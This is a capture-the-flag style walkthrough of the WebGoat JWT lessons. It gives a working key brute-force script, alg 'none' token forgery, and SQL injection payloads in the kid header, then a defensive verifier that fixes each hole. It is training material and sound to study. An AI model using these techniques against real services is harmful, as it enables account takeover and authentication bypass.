# JWT Token

### 3/

Use jwt.io to decode the token; the payload contains the username.

### 5/

After decoding, you will see that the algorithm is HS256 and admin is false.

First, edit alg to "none". Next, edit the admin value to "true":

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2F4zjIGFxWqjoOX7fCGNBd%2Fimage.png?alt=media\&token=9acfab8b-2a05-4263-a4b6-354a9d303a05)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FUkKNK3NlrlD3huL50IHm%2Fimage.png?alt=media\&token=29975415-87bb-422c-a9b7-120213f26959)

Edit the cookie and send the request:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FkWlNKx5fGUmv4xoQYrC8%2Fimage.png?alt=media\&token=293c6664-5727-4232-a84f-19f878dea2ea)

### 8/

```
eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDE1MDk3MiwiZXhwIjoxNjQwMTUxMDMyLCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.dlRNogwJ7D5mrP2ZvXlG5LW1d1U-vqq4DNld1EeN-FA
```

First, we must find the key of this token; after that, change the username field in the token to 'WebGoat' to solve the challenge (the algorithm is HS256).

I use [1000000-password-seclists.txt](https://raw.githubusercontent.com/duyet/bruteforce-database/master/1000000-password-seclists.txt) to brute-force the key.

Code to find the key:

```python
import jwt  # PyJWT

jwt_str = R'eyJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImlhdCI6MTY0MDEzOTY5NywiZXhwIjoxNjQwMTM5NzU3LCJzdWIiOiJ0b21Ad2ViZ29hdC5vcmciLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQub3JnIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.1XUCWT94XEVfGV1OBGV4cLMJhqCMbzWzZI39I01Exmc'

with open('1000000-password-seclists.txt', encoding='utf-8', errors='ignore') as f:
    for line in f:
        key = line.strip()
        if not key:
            continue
        try:
            # Only the HMAC signature matters here. Skip the exp and aud claim checks so
            # that an expired token, or an 'aud' claim we did not pass in, cannot mask a
            # correct key (PyJWT would otherwise raise for both after the signature passes).
            jwt.decode(jwt_str, key, algorithms=['HS256'],
                       options={'verify_exp': False, 'verify_aud': False})
        except (jwt.exceptions.InvalidSignatureError, jwt.exceptions.InvalidKeyError):
            continue
        print('Key found : ', key)
        break
    else:
        print("No key found.")
```

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FJy2JtGrG2COnos1cujFT%2Fimage.png?alt=media\&token=5d440494-5bbd-4185-9273-573387ad1354)

I found that the key is victory; use this key to decode the token and change the username to WebGoat:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FcgWhyrlLGLEuHxKQm2S3%2Fimage.png?alt=media\&token=9b282495-dcdb-4086-b9b9-193a21d94634)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FbqrlfDJwFoYjbRkqdYay%2Fimage.png?alt=media\&token=ed1e7f5c-6030-4a9c-8e40-0491ebe0e4af)

When we submit it, we receive a message that the JWT token is expired:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FN586uy5OUZzVZNWmKrdi%2Fimage.png?alt=media\&token=1baaa0ba-deef-469f-b055-471df9381565)

Change the exp value and submit the token again to solve the challenge:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FJt6D83KsgXOub4Cn0CWI%2Fimage.png?alt=media\&token=26b8a5ff-443b-49f9-a8d7-bc6333dfa3ba)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FvZFgQYuAH11xCtlUdAgg%2Fimage.png?alt=media\&token=e743de67-4d62-434d-803b-f0e158d3d2da)

### 10/

This challenge is similar to [challenge 5](#5).

Go to the file logs.txt, where we get a token:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2F72gKAnHLbt6JHVb7rTao%2Fimage.png?alt=media\&token=a1b0405c-cbe6-43a3-859d-05f7a1d9f837)

Modify the request with Burp Suite; we will see the Authorization header:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FD8QlRbU9nIyUAMjcdKjv%2Fimage.png?alt=media\&token=341319ee-6d7d-4dc2-95bb-54134da34bdb)

We will edit the token we got and then use it as the value of the Authorization header.

The algorithm is "None":

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FQk7IfWKNviXnnQsK1dPD%2Fimage.png?alt=media\&token=dd07cc92-b9ca-438e-885d-097c972232b4)

Edit the admin field to "true":

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FzecMYNvDJz8pkchv8zmX%2Fimage.png?alt=media\&token=6ccce0eb-8278-416d-bdf2-74cc7a95b734)

Send the request with the new token to solve the challenge:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FWiqPQEPsffVq4Uni9d2r%2Fimage.png?alt=media\&token=a32d1d2c-1235-47a7-98c5-4389510863b3)

### 11/

First, use [jwt.io](https://jwt.io) to decode:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FYUuTLeCz1vobHV7qj9ZW%2Fimage.png?alt=media\&token=61bae254-2308-49e0-9e22-e4916e36e69a)

In the header you will see "kid", which is different from the other challenges.

Take a look at the [source code on WebGoat's GitHub](https://github.com/WebGoat/WebGoat/blob/develop/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/jwt/JWTFinalEndpoint.java):

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FfQYbHZsGSWvlxmVNOCkB%2Fimage.png?alt=media\&token=4e9800d0-1343-42da-8e84-c93a43939881)

Here we can see that the key is selected from the database where id = kid. We can use SQL injection to make it return our own key.

Something like this:

```sql
' union select 'key' from INFORMATION_SCHEMA.SYSTEM_USERS; --
```

When the query is executed, the key used for the JWT is 'key' (our own key).

One more step: as you can see, before this value is used as the JWT key it is base64-decoded first:

```java
TextCodec.BASE64.decode(rs.getString(1));
```

So we must set the value for kid to:

```sql
' union select 'a2V5' from INFORMATION_SCHEMA.SYSTEM_USERS; --
```

Finally, edit the username to "Tom", delete exp, and use 'key' as the signing key:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FwjVtHE4Y1qUjJrByqXwa%2Fimage.png?alt=media\&token=8df04ada-500b-478a-ad70-a6009ee88abf)

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2F5HUV2J903HovmhsoFvcn%2Fimage.png?alt=media\&token=c0ea1e87-2145-4906-bd2f-f758df7b93fe)

Submit the new token to solve the challenge:

![](https://3988928172-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F18Xd0xa2XUhryqgx9yEk%2Fuploads%2FnRNlPR6Ha4BXtlcpWkjn%2Fimage.png?alt=media\&token=ef87e0f4-a0ab-4fb5-a36e-46c556f09d10)
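As an added example (not WebGoat's code and not from this writeup), here is a minimal stdlib HS256 verifier that closes the three holes walked through above: alg=none (challenges 5 and 10), a missing or edited exp (challenge 8), and a kid concatenated into SQL (challenge 11), with the vulnerable key lookup shown beside the parameterised one. The key table, its contents and the kid values are constructed; sqlite stands in for WebGoat's HSQLDB, so the UNION payload is written without a FROM clause.

```python
import base64, hashlib, hmac, json, sqlite3, time

def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def b64url_encode(b):
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()

# Constructed key store (hypothetical table, not WebGoat's schema); secrets are base64 text.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE jwt_keys (id TEXT PRIMARY KEY, secret TEXT)")
db.execute("INSERT INTO jwt_keys VALUES ('webgoat_key', ?)",
           (base64.b64encode(b"victory").decode(),))

def lookup_key_vulnerable(kid):
    # The lesson's bug: kid is pasted into the SQL text, so a UNION in kid picks the secret.
    row = db.execute("SELECT secret FROM jwt_keys WHERE id = '" + kid + "'").fetchone()
    return base64.b64decode(row[0]) if row else None

def lookup_key_safe(kid):
    # Parameterised query: kid is data, never SQL; unknown ids yield no key.
    row = db.execute("SELECT secret FROM jwt_keys WHERE id = ?", (kid,)).fetchone()
    return base64.b64decode(row[0]) if row else None

def verify(token, lookup, now=None):
    """Return the claims if the token is valid under `lookup`, else None."""
    try:
        h64, p64, s64 = token.split(".")
        header = json.loads(b64url_decode(h64))
        claims = json.loads(b64url_decode(p64))
        sig = b64url_decode(s64)
    except ValueError:  # wrong segment count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None  # algorithm is pinned server-side: 'none' is never accepted
    key = lookup(str(header.get("kid", "")))
    if not key:
        return None
    expected = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    now = time.time() if now is None else now
    if not isinstance(claims, dict) or now >= claims.get("exp", 0):
        return None  # exp is required and enforced; deleting it does not help
    return claims

def sign(header, claims, key):  # constructed HS256 signer for the demo; same encoding as verify()
    h64 = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p64 = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{h64}.{p64}".encode(), hashlib.sha256).digest()
    return f"{h64}.{p64}.{b64url_encode(sig)}"
```

With `lookup_key_vulnerable` a token whose kid carries the UNION and whose signature uses the attacker's decoded 'key' verifies; with `lookup_key_safe` the same token fails because the injected kid matches no row.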
